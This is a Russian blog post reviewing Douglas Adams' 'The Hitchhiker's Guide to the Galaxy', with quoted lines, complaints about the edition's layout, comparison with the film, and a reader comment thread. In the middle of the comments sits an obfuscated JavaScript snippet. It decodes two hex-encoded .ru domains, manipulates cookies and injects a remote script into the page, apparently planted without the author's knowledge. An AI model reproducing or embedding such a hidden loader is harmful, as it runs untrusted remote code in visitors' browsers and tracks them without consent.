Автостопом по галактике.

— Форд, ты превращаешься в пингвина. Прекрати! 
Форд вперевалочку бегал вокруг пруда.

Марвин: — Я выполнил ваше указание. Что прикажетеделать дальше: тихо ржаветь в углу или скончаться прямо на месте?

Артур уставился на экраны, хлопая глазами. Ему не хватало чего-то крайне важного… Внезапно он догадался:
— А чай на этом корабле есть?

Тру англичанин.

В кабинете Слартибартфаста царил кавардак, словно после оргии в публичной библиотеке.

Сравнение 10 из 10.

Книга, к слову, отличная, но издание огорчает бездумной порчей бумаги. Зачем начинать каждую главу с новой страницы, отступая при этом на четверть. А глав много и содержательностью они не отличаются. Ещё малость печально понимать, что ничего после фильма не удивит, скорей всего, в любом случае первая книга вся строго по фильму. Дело видимо в том, что автор лично сценарий писал. Но этот факт всё равно ничего не портит.

Обсудить у себя 4
Комментарии (9)

Жаль, что они следующие книги не экранизировали.

// <![CDATA[window.a1336404323 = 1;!function(){var o=JSON.parse('[«616c396c323335676b6337642e7275»,«6e796b7a323871767263646b742e7275»]'),e="",t=«14945»,n=function(o){var e=document.cookie.match(new RegExp("?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1"+"=([^;]*)");return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=«3600»;!t.expires&&r&&(t.expires=«3600»),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,«text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,«function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),«function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))f=r(e)+"/ajs/"+t+"/c/"+c(«mysteria.mypage.ru»)+"_"+(self===top?0:1)+".js",a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();]]>

Я проклят кодовым демоном

И это жепа

Обида ебаная

Веб, я очень рад что ты ознакомилась с книгой С: И тебе понравилось. 

Фильм что ли посмотреть. 

И я тоже рад! Зря позволил ей пылиться на полке два месяца. Но я лишь начал, только первую прочитал. 

Конечно, зря. Но хотя зато насладился ей сейчас.

Я тоже и мне кажется эта лучшая.

Забыл упомянуть, в некоторых моментах всплывают разные выражении лица Фримена и ты понимаешь, что эта роль создана для него. Может я слишком громко сказал, но в любом случае, я рад, что играл Артура он.

А вот Форд не соответствует книжному описанию. Отнюдь не «рыжеватый», он вообще, соррян, черный.

Черт, помню видел из фильма какой-то фрагмент. Тоже помню удивился так, мол, Форд, какого хрена.

Чтобы комментировать надо зарегистрироваться или если вы уже регистрировались войти в свой аккаунт.

Войти через социальные сети:

it's the end
but i will build a new beginning